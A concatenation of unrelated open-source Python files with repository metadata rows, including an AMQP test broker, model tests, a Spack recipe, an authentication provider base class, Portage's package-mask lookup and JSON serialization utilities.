        assert link.is_sender
        assert link not in self.consumers

        self.consumers.append(link)

        self.broker.info("Added consumer for {0} to {1}", link.connection, self)

    def remove_consumer(self, link):
        """Deregister a consumer; a no-op if it was never registered."""
        assert link.is_sender

        try:
            self.consumers.remove(link)
        except ValueError:
            return

        self.broker.info("Removed consumer for {0} from {1}", link.connection, self)

    def store_message(self, delivery, message):
        """Append an incoming message for later forwarding."""
        self.messages.append(message)

        self.broker.notice("Stored {0} from {1} on {2}", message, delivery.connection, self)

    def forward_messages(self):
        """Deliver stored messages across consumers, up to total credit.

        NOTE(review): the deque is rotated by `sent` both on the
        out-of-messages early return and after each full pass --
        presumably to resume round-robin at the next consumer on the
        following call; confirm the intended rotation semantics.
        """
        credit = sum([x.credit for x in self.consumers])
        sent = 0

        if credit == 0:
            return

        while sent < credit:
            for consumer in self.consumers:
                if consumer.credit == 0:
                    continue

                try:
                    message = self.messages.popleft()
                except IndexError:
                    # Queue drained before credit was exhausted.
                    self.consumers.rotate(sent)
                    return

                consumer.send(message)
                sent += 1

                self.broker.notice("Forwarded {0} on {1} to {2}", message, self, consumer.connection)

            self.consumers.rotate(sent)
class _Handler(_handlers.MessagingHandler):
    """Proton event handler implementing the broker: accepts connections,
    maintains one _Queue per address, and forwards stored messages to
    consumers as credit becomes available."""

    def __init__(self, broker):
        super(_Handler, self).__init__()

        self.broker = broker
        # Maps address string -> _Queue; populated lazily by get_queue().
        self.queues = dict()
        self.verbose = False

    def on_start(self, event):
        # Start listening; configure server-side TLS first when required.
        interface = "{0}://{1}:{2}".format(self.broker.scheme, self.broker.host, self.broker.port)

        if self.broker.scheme == "amqps":
            server_ssl_domain = event.container.ssl.server
            server_ssl_domain.set_credentials(self.broker.cert, self.broker.key, self.broker.key_password)

            if self.broker.trusted_db:
                server_ssl_domain.set_trusted_ca_db(self.broker.trusted_db)
                server_ssl_domain.set_peer_authentication(_proton.SSLDomain.VERIFY_PEER, self.broker.trusted_db)
            else:
                server_ssl_domain.set_peer_authentication(_proton.SSLDomain.ANONYMOUS_PEER)

        self.acceptor = event.container.listen(interface)

        self.broker.notice("Listening for connections on '{0}'", interface)

        if self.broker.ready_file is not None:
            _time.sleep(0.1) # XXX
            # Signal readiness to an external watcher via a sentinel file.
            with open(self.broker.ready_file, "w") as f:
                f.write("ready\n")

    def get_queue(self, address):
        # Return the queue for 'address', creating it on first use.
        try:
            queue = self.queues[address]
        except KeyError:
            queue = self.queues[address] = _Queue(self.broker, address)

        return queue

    def on_link_opening(self, event):
        if event.link.is_sender:
            # Dynamic sources get a generated per-connection address.
            if event.link.remote_source.dynamic:
                address = "{0}/{1}".format(event.connection.remote_container, event.link.name)
            else:
                address = event.link.remote_source.address

            assert address is not None

            event.link.source.address = address

            queue = self.get_queue(address)
            queue.add_consumer(event.link)

        if event.link.is_receiver:
            # Echo the requested target back to the client.
            address = event.link.remote_target.address
            event.link.target.address = address

    def on_link_closing(self, event):
        if event.link.is_sender:
            queue = self.queues[event.link.source.address]
            queue.remove_consumer(event.link)

    def on_connection_init(self, event):
        event.transport.sasl().allow_insecure_mechs=True

    def on_connection_opening(self, event):
        # XXX I think this should happen automatically
        event.connection.container = event.container.container_id

    def on_connection_opened(self, event):
        self.broker.notice("Opened connection from {0}", event.connection)

    def on_connection_closing(self, event):
        self.remove_consumers(event.connection)

    def on_connection_closed(self, event):
        self.broker.notice("Closed connection from {0}", event.connection)

    def on_disconnected(self, event):
        self.broker.notice("Disconnected from {0}", event.connection)

        self.remove_consumers(event.connection)

    def remove_consumers(self, connection):
        # Walk the connection's remotely-active links and detach any
        # senders from their queues (cleanup on close/disconnect).
        link = connection.link_head(_proton.Endpoint.REMOTE_ACTIVE)

        while link is not None:
            if link.is_sender:
                queue = self.queues[link.source.address]
                queue.remove_consumer(link)

            link = link.next(_proton.Endpoint.REMOTE_ACTIVE)

    def on_link_flow(self, event):
        # Honor drain requests by reporting all remaining credit used.
        if event.link.is_sender and event.link.drain_mode:
            event.link.drained()

    def on_sendable(self, event):
        queue = self.get_queue(event.link.source.address)
        queue.forward_messages()

    def on_settled(self, event):
        # Log the remote settlement outcome at a matching severity.
        template = "Container '{0}' {1} {2} to {3}"
        container = event.connection.remote_container
        source = event.link.source
        delivery = event.delivery

        if delivery.remote_state == delivery.ACCEPTED:
            self.broker.info(template, container, "accepted", delivery, source)
        elif delivery.remote_state == delivery.REJECTED:
            self.broker.warn(template, container, "rejected", delivery, source)
        elif delivery.remote_state == delivery.RELEASED:
            self.broker.notice(template, container, "released", delivery, source)
        elif delivery.remote_state == delivery.MODIFIED:
            self.broker.notice(template, container, "modified", delivery, source)

    def on_message(self, event):
        message = event.message
        delivery = event.delivery
        address = event.link.target.address

        # Anonymous-relay receivers carry the address on the message itself.
        if address is None:
            address = message.address

        queue = self.get_queue(address)
        queue.store_message(delivery, message)

        queue.forward_messages()

    #
    # def on_unhandled(self, name, event):
    #     _sys.stderr.write("{0} {1}\n".format(name, event))
    #     _sys.stderr.flush()
if __name__ == "__main__":
    def _print(message, *args):
        """Format *message* with *args* and write it to stderr, flushing."""
        message = message.format(*args)
        _sys.stderr.write("{0}\n".format(message))
        _sys.stderr.flush()

    class _Broker(Broker):
        # Route every log level to stderr when running as a script.
        def info(self, message, *args): _print(message, *args)
        def notice(self, message, *args): _print(message, *args)
        def warn(self, message, *args): _print(message, *args)

    try:
        host, port = _sys.argv[1:3]
    except ValueError:
        # BUG FIX: unpacking a too-short slice raises ValueError, not
        # IndexError, so the original 'except IndexError' never fired and
        # missing arguments produced a raw traceback instead of usage help.
        _print("Usage: brokerlib <host> <port>")
        _sys.exit(1)

    try:
        port = int(port)
    except ValueError:
        _print("The port must be an integer")
        _sys.exit(1)

    broker = _Broker(host, port)

    try:
        broker.run()
    except KeyboardInterrupt:
        pass
| tabish121/quiver | python/brokerlib.py | Python | apache-2.0 | 11,350 |
"""Run bark-spider using waitress.
"""
import bark_spider.app
from waitress import serve
serve(bark_spider.app.make_app(), listen="*:8080")
| sixty-north/bark-spider | wsgi.py | Python | agpl-3.0 | 142 |
#! /usr/bin/env python3
"""Test whether given Newick/NHX trees are valid for ProPhyle.
Author: Karel Brinda <kbrinda@hsph.harvard.edu>
Licence: MIT
Example:
$ prophyle_validate_tree.py ~/prophyle/bacteria.nw ~/prophyle/viruses.nw
"""
import os
import sys
import argparse
sys.path.append(os.path.dirname(__file__))
import prophylelib as pro
def main():
    """Parse the command line and validate each tree; exit non-zero on failure."""
    parser = argparse.ArgumentParser(description='Verify a Newick/NHX tree')
    parser.add_argument(
        'tree',
        metavar='<tree.nw>',
        type=str,
        nargs='+',
        help='phylogenetic tree (in Newick/NHX)',
    )

    args = parser.parse_args()

    all_valid = True

    # Validate every tree, reporting per-file status as we go.
    for fn in args.tree:
        print("Validating '{}'".format(fn))
        tree = pro.load_nhx_tree(fn, validate=False)
        valid = pro.validate_prophyle_nhx_tree(
            tree, verbose=True, throw_exceptions=False, output_fo=sys.stdout)
        if valid:
            print(" ...OK")
        else:
            all_valid = False
        print()

    sys.exit(0 if all_valid else 1)


if __name__ == "__main__":
    main()
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPy2neo(PythonPackage):
    """Py2neo is a client library and toolkit for working with Neo4j from
    within Python applications and from the command line."""

    homepage = "http://py2neo.org/"
    url = "https://github.com/nigelsmall/py2neo/archive/py2neo-2.0.8.tar.gz"

    # Each version is pinned by its release tarball's md5 checksum.
    version('2.0.8', 'e3ec5172a9e006515ef4155688a05a55')
    version('2.0.7', '4cfbc5b7dfd7757f3d2e324805faa639')
    version('2.0.6', '53e4cdb1a95fbae501c66e541d5f4929')
    version('2.0.5', '143b1f9c0aa22faf170c1b9f84c7343b')
    version('2.0.4', 'b3f7efd3344dc3f66db4eda11e5899f7')

    # setuptools is only needed to build/install the package.
    depends_on("py-setuptools", type='build')
| wscullin/spack | var/spack/repos/builtin/packages/py-py2neo/package.py | Python | lgpl-2.1 | 1,874 |
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from transformers import BertConfig, is_flax_available
from transformers.testing_utils import require_flax, slow
from .test_modeling_flax_common import FlaxModelTesterMixin, ids_tensor, random_attention_mask
if is_flax_available():
from transformers.models.bert.modeling_flax_bert import (
FlaxBertForMaskedLM,
FlaxBertForMultipleChoice,
FlaxBertForNextSentencePrediction,
FlaxBertForPreTraining,
FlaxBertForQuestionAnswering,
FlaxBertForSequenceClassification,
FlaxBertForTokenClassification,
FlaxBertModel,
)
class FlaxBertModelTester(unittest.TestCase):
    """Fixture that builds a small BertConfig and random input tensors for
    the Flax BERT model tests. Holds every hyperparameter as an attribute
    so individual tests can override them via the constructor."""

    def __init__(
        self,
        parent,
        batch_size=13,
        seq_length=7,
        is_training=True,
        use_attention_mask=True,
        use_token_type_ids=True,
        use_labels=True,
        vocab_size=99,
        hidden_size=32,
        num_hidden_layers=5,
        num_attention_heads=4,
        intermediate_size=37,
        hidden_act="gelu",
        hidden_dropout_prob=0.1,
        attention_probs_dropout_prob=0.1,
        max_position_embeddings=512,
        type_vocab_size=16,
        type_sequence_label_size=2,
        initializer_range=0.02,
        num_choices=4,
    ):
        # 'parent' is the test case that owns this tester (for assertions).
        self.parent = parent
        self.batch_size = batch_size
        self.seq_length = seq_length
        self.is_training = is_training
        self.use_attention_mask = use_attention_mask
        self.use_token_type_ids = use_token_type_ids
        self.use_labels = use_labels
        self.vocab_size = vocab_size
        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.intermediate_size = intermediate_size
        self.hidden_act = hidden_act
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        self.max_position_embeddings = max_position_embeddings
        self.type_vocab_size = type_vocab_size
        self.type_sequence_label_size = type_sequence_label_size
        self.initializer_range = initializer_range
        self.num_choices = num_choices

    def prepare_config_and_inputs(self):
        """Build (config, input_ids, token_type_ids, attention_mask) with
        random contents sized by the tester's hyperparameters."""
        input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)

        attention_mask = None
        if self.use_attention_mask:
            attention_mask = random_attention_mask([self.batch_size, self.seq_length])

        token_type_ids = None
        if self.use_token_type_ids:
            token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)

        config = BertConfig(
            vocab_size=self.vocab_size,
            hidden_size=self.hidden_size,
            num_hidden_layers=self.num_hidden_layers,
            num_attention_heads=self.num_attention_heads,
            intermediate_size=self.intermediate_size,
            hidden_act=self.hidden_act,
            hidden_dropout_prob=self.hidden_dropout_prob,
            attention_probs_dropout_prob=self.attention_probs_dropout_prob,
            max_position_embeddings=self.max_position_embeddings,
            type_vocab_size=self.type_vocab_size,
            is_decoder=False,
            initializer_range=self.initializer_range,
        )

        return config, input_ids, token_type_ids, attention_mask

    def prepare_config_and_inputs_for_common(self):
        """Repackage prepare_config_and_inputs() into the (config, dict)
        shape expected by the shared FlaxModelTesterMixin tests."""
        config_and_inputs = self.prepare_config_and_inputs()
        config, input_ids, token_type_ids, attention_mask = config_and_inputs
        inputs_dict = {"input_ids": input_ids, "token_type_ids": token_type_ids, "attention_mask": attention_mask}
        return config, inputs_dict
@require_flax
class FlaxBertModelTest(FlaxModelTesterMixin, unittest.TestCase):
    """Runs the shared Flax model-tester suite over every BERT head class."""

    # BUG FIX: FlaxBertForQuestionAnswering was listed twice, which made the
    # mixin run its tests twice for no benefit; the duplicate is removed.
    all_model_classes = (
        (
            FlaxBertModel,
            FlaxBertForPreTraining,
            FlaxBertForMaskedLM,
            FlaxBertForMultipleChoice,
            FlaxBertForQuestionAnswering,
            FlaxBertForNextSentencePrediction,
            FlaxBertForSequenceClassification,
            FlaxBertForTokenClassification,
        )
        if is_flax_available()
        else ()
    )

    def setUp(self):
        self.model_tester = FlaxBertModelTester(self)

    @slow
    def test_model_from_pretrained(self):
        """Smoke-test: load each class from the hub and run a dummy input."""
        for model_class_name in self.all_model_classes:
            model = model_class_name.from_pretrained("bert-base-cased", from_pt=True)
            outputs = model(np.ones((1, 1)))
            self.assertIsNotNone(outputs)
| huggingface/pytorch-transformers | tests/test_modeling_flax_bert.py | Python | apache-2.0 | 5,250 |
#!/usr/bin/env python
"""
[appname]
[author]
[description]
"""
import os
from flask import Flask, render_template, url_for
def static(filename):
    """Provides the 'static' function that also appends the file's timestamp to the URL, usable in a template."""
    full_path = os.path.join(app.static_folder, filename)
    mtime = os.path.getmtime(full_path)
    return "{0}/{1}?{2}".format(app.static_url_path, filename, mtime)
# Flask application
app = Flask(__name__)
# Expose static() to Jinja templates so asset URLs carry a cache-busting
# timestamp query string.
app.jinja_env.globals.update(static=static)

# Views
@app.route('/')
def index():
    # Landing page.
    return render_template('index.html')

@app.errorhandler(404)
def page_not_found(error):
    # Custom 404 page; the explicit status code preserves the error response.
    return render_template('error404.html'), 404

# Run dev server
if __name__ == '__main__':
    app.run('localhost', port=80, debug=True)
| joeyespo/flask-scaffold | [appname].py | Python | mit | 763 |
import PyOpenWorm as P
from PyOpenWorm import Cell
class Muscle(Cell):
    """A single muscle cell.

    See what neurons innervate a muscle:

    Example::

        >>> mdr21 = P.Muscle('MDR21')
        >>> innervates_mdr21 = mdr21.innervatedBy()
        >>> len(innervates_mdr21)
        4

    Attributes
    ----------
    neurons : ObjectProperty
        Neurons synapsing with this muscle
    receptors : DatatypeProperty
        Get a list of receptors for this muscle if called with no arguments,
        or state that this muscle has the given receptor type if called with
        an argument
    """
    def __init__(self, name=False, **kwargs):
        # NOTE(review): 'name=False' (rather than None) presumably mirrors
        # the Cell base-class signature — confirm before changing.
        Cell.__init__(self, name=name, **kwargs)
        # Neurons that innervate this muscle (multi-valued object property).
        self.innervatedBy = Muscle.ObjectProperty("neurons",owner=self,value_type=P.Neuron, multiple=True)
        # Receptor types present on this muscle (multi-valued data property).
        Muscle.DatatypeProperty("receptors",owner=self,multiple=True)

    def __str__(self):
        return self.name()
| hnunner/PyOpenWorm | PyOpenWorm/muscle.py | Python | mit | 935 |
import abc
from sqlalchemy.orm import exc
from watson.auth import crypto
from watson.auth.providers import exceptions
from watson.common import imports
from watson.common.decorators import cached_property
class Base(object):
    """Abstract base for authentication providers backed by a SQLAlchemy
    session. Concrete providers implement login/logout/handle_request."""

    config = None
    session = None

    def __init__(self, config, session):
        self._validate_configuration(config)
        self.config = config
        self.session = session

    # Configuration
    def _validate_configuration(self, config):
        # Fail fast on missing mandatory configuration keys.
        if 'class' not in config['model']:
            raise exceptions.InvalidConfiguration(
                'User model not specified, ensure "class" key is set on provider["model"].')
        common_keys = [
            'system_email_from_address',
            'reset_password_route',
            'forgotten_password_route']
        for key in common_keys:
            if key not in config:
                raise exceptions.InvalidConfiguration(
                    'Ensure "{}" key is set on the provider.'.format(key))

    # User retrieval
    @property
    def user_model_identifier(self):
        # Name of the model attribute used to look users up (e.g. username).
        return self.config['model']['identifier']

    @cached_property
    def user_model(self):
        # Resolve the dotted-path user model class once, then cache it.
        return imports.load_definition_from_string(
            self.config['model']['class'])

    @property
    def user_query(self):
        return self.session.query(self.user_model)

    def get_user(self, username):
        """Retrieves a user from the database based on their username.

        Args:
            username (string): The username of the user to find.

        Returns None when no matching user exists.
        """
        user_field = getattr(self.user_model, self.user_model_identifier)
        try:
            return self.user_query.filter(user_field == username).one()
        except exc.NoResultFound:
            return None

    def get_user_by_email_address(self, email_address):
        """Retrieve a user by email address, or None when not found."""
        email_column = getattr(
            self.user_model, self.config['model']['email_address'])
        try:
            return self.user_query.filter(email_column == email_address).one()
        except exc.NoResultFound:
            return None

    # Authentication
    def authenticate(self, username, password):
        """Validate a user against a supplied username and password.

        Args:
            username (string): The username of the user.
            password (string): The password of the user.

        Returns the user on success, otherwise None.
        """
        password_config = self.config['password']
        # Reject over-long passwords outright before any hashing work.
        if len(password) > password_config['max_length']:
            return None
        user = self.get_user(username)
        if user:
            if crypto.check_password(password, user.password, user.salt,
                                     self.config['encoding']):
                return user
        return None

    def user_meets_requirements(self, user, requires):
        """Return True only if every callable in *requires* accepts *user*."""
        for require in requires or []:
            if not require(user):
                return False
        return True

    # Authorization
    def is_authorized(self, user, roles=None, permissions=None, requires=None):
        """Return True when the user passes all supplied role, permission
        and requirement checks; criteria left as None are ignored."""
        no_role = roles and not user.acl.has_role(roles)
        no_permission = permissions and not user.acl.has_permission(
            permissions)
        # NOTE(review): despite the 'no_' prefix, this local holds True when
        # the requirements ARE met; it is negated again in the return below.
        no_requires = self.user_meets_requirements(user, requires)
        return False if no_role or no_permission or not no_requires else True

    # Actions
    @abc.abstractmethod
    def logout(self, request):
        raise NotImplementedError  # pragma: no cover

    @abc.abstractmethod
    def login(self, user, request):
        raise NotImplementedError  # pragma: no cover

    @abc.abstractmethod
    def handle_request(self, request):
        raise NotImplementedError  # pragma: no cover
| watsonpy/watson-auth | watson/auth/providers/abc.py | Python | bsd-3-clause | 3,673 |
# Copyright 2010-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = ['getmaskingreason']
import portage
from portage import os
from portage.const import USER_CONFIG_PATH
from portage.dep import Atom, match_from_list
from portage.exception import InvalidAtom
from portage.localization import _
from portage.repository.config import _gen_valid_repo
from portage.util import grablines, normalize_path
from portage.versions import catpkgsplit, _pkg_str
def getmaskingreason(mycpv, metadata=None, settings=None,
    portdb=None, return_location=False, myrepo=None):
    """
    If specified, the myrepo argument is assumed to be valid. This
    should be a safe assumption since portdbapi methods always
    return valid repo names and valid "repository" metadata from
    aux_get.

    Returns the package.mask comment that applies to mycpv (or a
    (comment, filename) pair when return_location is True), or
    None/(None, None) when no mask entry matches.
    """

    if settings is None:
        settings = portage.settings
    if portdb is None:
        portdb = portage.portdb
    mysplit = catpkgsplit(mycpv)
    if not mysplit:
        raise ValueError(_("invalid CPV: %s") % mycpv)

    if metadata is None:
        # Fetch metadata ourselves; tolerate a KeyError for packages that
        # do exist but whose metadata is broken.
        db_keys = list(portdb._aux_cache_keys)
        try:
            metadata = dict(zip(db_keys,
                portdb.aux_get(mycpv, db_keys, myrepo=myrepo)))
        except KeyError:
            if not portdb.cpv_exists(mycpv):
                raise
        else:
            if myrepo is None:
                myrepo = _gen_valid_repo(metadata["repository"])

    elif myrepo is None:
        myrepo = metadata.get("repository")
        if myrepo is not None:
            myrepo = _gen_valid_repo(metadata["repository"])

    if metadata is not None and \
        not portage.eapi_is_supported(metadata["EAPI"]):
        # Return early since otherwise we might produce invalid
        # results given that the EAPI is not supported. Also,
        # metadata is mostly useless in this case since it doesn't
        # contain essential things like SLOT.
        if return_location:
            return (None, None)
        else:
            return None

    # Sometimes we can't access SLOT or repository due to corruption.
    pkg = mycpv
    try:
        pkg.slot
    except AttributeError:
        pkg = _pkg_str(mycpv, metadata=metadata, repo=myrepo)

    cpv_slot_list = [pkg]

    mycp = pkg.cp

    # XXX- This is a temporary duplicate of code from the config constructor.
    # Collect every profile/overlay/user location that may carry a
    # package.mask file, most specific last, then reverse so user config
    # is consulted first.
    locations = [os.path.join(settings["PORTDIR"], "profiles")]
    locations.extend(settings.profiles)
    for ov in settings["PORTDIR_OVERLAY"].split():
        profdir = os.path.join(normalize_path(ov), "profiles")
        if os.path.isdir(profdir):
            locations.append(profdir)
    locations.append(os.path.join(settings["PORTAGE_CONFIGROOT"],
        USER_CONFIG_PATH))
    locations.reverse()
    pmasklists = []
    for profile in locations:
        pmask_filename = os.path.join(profile, "package.mask")
        node = None
        # Group the grabbed lines per originating (possibly recursive) file.
        for l, recursive_filename in grablines(pmask_filename,
            recursive=1, remember_source_file=True):
            if node is None or node[0] != recursive_filename:
                node = (recursive_filename, [])
                pmasklists.append(node)
            node[1].append(l)

    pmaskdict = settings._mask_manager._pmaskdict
    if mycp in pmaskdict:
        for x in pmaskdict[mycp]:
            if match_from_list(x, cpv_slot_list):
                x = x.without_repo
                for pmask in pmasklists:
                    # Scan the raw file text for the atom, accumulating the
                    # '#' comment block that immediately precedes it.
                    comment = ""
                    comment_valid = -1
                    pmask_filename = pmask[0]
                    for i in range(len(pmask[1])):
                        l = pmask[1][i].strip()
                        try:
                            l_atom = Atom(l, allow_repo=True,
                                allow_wildcard=True).without_repo
                        except InvalidAtom:
                            l_atom = None
                        if l == "":
                            comment = ""
                            comment_valid = -1
                        elif l[0] == "#":
                            comment += (l+"\n")
                            comment_valid = i + 1
                        elif l_atom == x:
                            if comment_valid != i:
                                comment = ""
                            if return_location:
                                return (comment, pmask_filename)
                            else:
                                return comment
                        elif comment_valid != -1:
                            # Apparently this comment applies to multiple masks, so
                            # it remains valid until a blank line is encountered.
                            comment_valid += 1
    if return_location:
        return (None, None)
    else:
        return None
| clickbeetle/portage-cb | pym/portage/package/ebuild/getmaskingreason.py | Python | gpl-2.0 | 3,872 |
#!/usr/bin/env python
from flask.ext import restful
from awbwFlask import mongo
from awbwFlask.common.methods import bsonToJson, generate_auth_token, hash_password, verify_auth_token, verify_password
from awbwFlask.common.variables import headers
class Login_EP(restful.Resource):
    """REST endpoint handling login via either an Awbw-Token header or
    a username/password pair in the request body."""

    def __init__(self):
        # Declare the accepted arguments: credentials from the body plus
        # an optional authentication token from the headers.
        self.reqparse = restful.reqparse.RequestParser()
        self.reqparse.add_argument('username', type=str, help='Invalid username')
        self.reqparse.add_argument('password', type=str, help='Invalid password')
        self.reqparse.add_argument('Awbw-Token', type=str, help='Invalid Token', location='headers')
        super(Login_EP, self).__init__()

    def post(self):
        args = self.reqparse.parse_args()

        if args['Awbw-Token']:
            # Token path: verify the token and short-circuit the DB lookup.
            token_data = verify_auth_token(args['Awbw-Token'])
            if not token_data:
                return {"message": "Invalid user token"}, 401, headers
            user = {'_id': token_data["_id"], 'username': token_data["username"]}
            message = "Logged in with token"
        else:
            # Credentials path: look up the user and check the password hash.
            user = mongo.db.users.find_one({ 'username': args['username'] })
            if not user:
                return {"message": "Login with username {} does not exist".format(args['username'])}, 404, headers
            if not verify_password(args['password'], user['password']):
                return {"message": "Invalid password for user {}".format(args['username'])}, 401, headers
            message = "Logged in with credentials"

        # Always issue a fresh token for subsequent requests.
        return {"message": message, "username": user["username"], "token": generate_auth_token(bsonToJson(user))}, 200
if __name__ == '__main__':
    # NOTE(review): 'app' is not defined in this module, so running this
    # file directly would raise NameError — presumably leftover scaffolding;
    # confirm before relying on it.
    app.run(debug=True)
| amarriner/awbwFlask | resources/LoginAPI.py | Python | mit | 1,642 |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''
JSON related utilities.
This module provides a few things:
1) A handy function for getting an object down to something that can be
JSON serialized. See to_primitive().
2) Wrappers around loads() and dumps(). The dumps() wrapper will
automatically use to_primitive() for you if needed.
3) This sets up anyjson to use the loads() and dumps() wrappers if anyjson
is available.
'''
import datetime
import functools
import inspect
import itertools
import json
try:
import xmlrpclib
except ImportError:
# NOTE(jaypipes): xmlrpclib was renamed to xmlrpc.client in Python3
# however the function and object call signatures
# remained the same. This whole try/except block should
# be removed and replaced with a call to six.moves once
# six 1.4.2 is released. See http://bit.ly/1bqrVzu
import xmlrpc.client as xmlrpclib
import six
from barbican.openstack.common import gettextutils
from barbican.openstack.common import importutils
from barbican.openstack.common import timeutils
netaddr = importutils.try_import("netaddr")
# Predicates identifying values that must not be introspected further
# (modules, classes, functions, frames, ...); to_primitive() renders such
# values via six.text_type() instead of recursing into them.
_nasty_type_tests = [inspect.ismodule, inspect.isclass, inspect.ismethod,
                     inspect.isfunction, inspect.isgeneratorfunction,
                     inspect.isgenerator, inspect.istraceback, inspect.isframe,
                     inspect.iscode, inspect.isbuiltin, inspect.isroutine,
                     inspect.isabstract]

# Types that are JSON-safe as-is; to_primitive() returns them unchanged.
_simple_types = (six.string_types + six.integer_types
                 + (type(None), bool, float))
def to_primitive(value, convert_instances=False, convert_datetime=True,
                 level=0, max_depth=3):
    """Convert a complex object into primitives.

    Handy for JSON serialization. We can optionally handle instances,
    but since this is a recursive function, we could have cyclical
    data structures.

    To handle cyclical data structures we could track the actual objects
    visited in a set, but not all objects are hashable. Instead we just
    track the depth of the object inspections and don't go too deep.

    Therefore, convert_instances=True is lossy ... be aware.

    :param value: object to convert
    :param convert_instances: recurse into arbitrary objects' __dict__
    :param convert_datetime: render datetimes via timeutils.strtime()
    :param level: current recursion depth (internal)
    :param max_depth: depth at which recursion gives up and returns '?'
    """
    # handle obvious types first - order of basic types determined by running
    # full tests on nova project, resulting in the following counts:
    # 572754 <type 'NoneType'>
    # 460353 <type 'int'>
    # 379632 <type 'unicode'>
    # 274610 <type 'str'>
    # 199918 <type 'dict'>
    # 114200 <type 'datetime.datetime'>
    #  51817 <type 'bool'>
    #  26164 <type 'list'>
    #   6491 <type 'float'>
    #    283 <type 'tuple'>
    #     19 <type 'long'>
    if isinstance(value, _simple_types):
        return value

    if isinstance(value, datetime.datetime):
        if convert_datetime:
            return timeutils.strtime(value)
        else:
            return value

    # value of itertools.count doesn't get caught by nasty_type_tests
    # and results in infinite loop when list(value) is called.
    if type(value) == itertools.count:
        return six.text_type(value)

    # FIXME(vish): Workaround for LP bug 852095. Without this workaround,
    #              tests that raise an exception in a mocked method that
    #              has a @wrap_exception with a notifier will fail. If
    #              we up the dependency to 0.5.4 (when it is released) we
    #              can remove this workaround.
    if getattr(value, '__module__', None) == 'mox':
        return 'mock'

    if level > max_depth:
        return '?'

    # The try block may not be necessary after the class check above,
    # but just in case ...
    try:
        recursive = functools.partial(to_primitive,
                                      convert_instances=convert_instances,
                                      convert_datetime=convert_datetime,
                                      level=level,
                                      max_depth=max_depth)
        if isinstance(value, dict):
            return dict((k, recursive(v)) for k, v in six.iteritems(value))
        elif isinstance(value, (list, tuple)):
            return [recursive(lv) for lv in value]

        # It's not clear why xmlrpclib created their own DateTime type, but
        # for our purposes, make it a datetime type which is explicitly
        # handled
        if isinstance(value, xmlrpclib.DateTime):
            value = datetime.datetime(*tuple(value.timetuple())[:6])

        if convert_datetime and isinstance(value, datetime.datetime):
            return timeutils.strtime(value)
        elif isinstance(value, gettextutils.Message):
            return value.data
        elif hasattr(value, 'iteritems'):
            return recursive(dict(value.iteritems()), level=level + 1)
        elif hasattr(value, '__iter__'):
            return recursive(list(value))
        elif convert_instances and hasattr(value, '__dict__'):
            # Likely an instance of something. Watch for cycles.
            # Ignore class member vars.
            return recursive(value.__dict__, level=level + 1)
        elif netaddr and isinstance(value, netaddr.IPAddress):
            return six.text_type(value)
        else:
            if any(test(value) for test in _nasty_type_tests):
                return six.text_type(value)
            return value
    except TypeError:
        # Class objects are tricky since they may define something like
        # __iter__ defined but it isn't callable as list().
        return six.text_type(value)
def dumps(value, default=to_primitive, **kwargs):
    """Serialize *value* to JSON, converting complex objects via to_primitive()."""
    return json.dumps(value, default=default, **kwargs)


def loads(s):
    """Deserialize a JSON document from the string *s*."""
    return json.loads(s)


def load(s):
    """Deserialize a JSON document from the file-like object *s*."""
    return json.load(s)
try:
    import anyjson
except ImportError:
    pass
else:
    # Register this module as an anyjson backend and force its use, so that
    # libraries routed through anyjson pick up to_primitive() support.
    anyjson._modules.append((__name__, 'dumps', TypeError,
                                       'loads', ValueError, 'load'))
    anyjson.force_implementation(__name__)
| stanzikratel/barbican-2 | barbican/openstack/common/jsonutils.py | Python | apache-2.0 | 6,717 |
__all__ = ["Cipher", "Util"]
| repotvsupertuga/tvsupertuga.repository | script.module.cryptolib/lib/Crypto/__init__.py | Python | gpl-2.0 | 29 |
from etcd import EtcdKeyNotFound
from subprocess import CalledProcessError
from tendrl.commons.event import Event
from tendrl.commons.message import ExceptionMessage
from tendrl.commons.utils import log_utils as logger
from tendrl.monitoring_integration.alert import constants
from tendrl.monitoring_integration.alert.handlers import AlertHandler
from tendrl.monitoring_integration.alert import utils
from tendrl.monitoring_integration.alert.exceptions import InvalidAlertSeverity
from tendrl.monitoring_integration.alert.exceptions import NodeNotFound
class CpuHandler(AlertHandler):
    """Translates Grafana CPU-utilization alerts into Tendrl alerts."""

    # Grafana alert type this handler is registered for.
    handles = 'cpu'
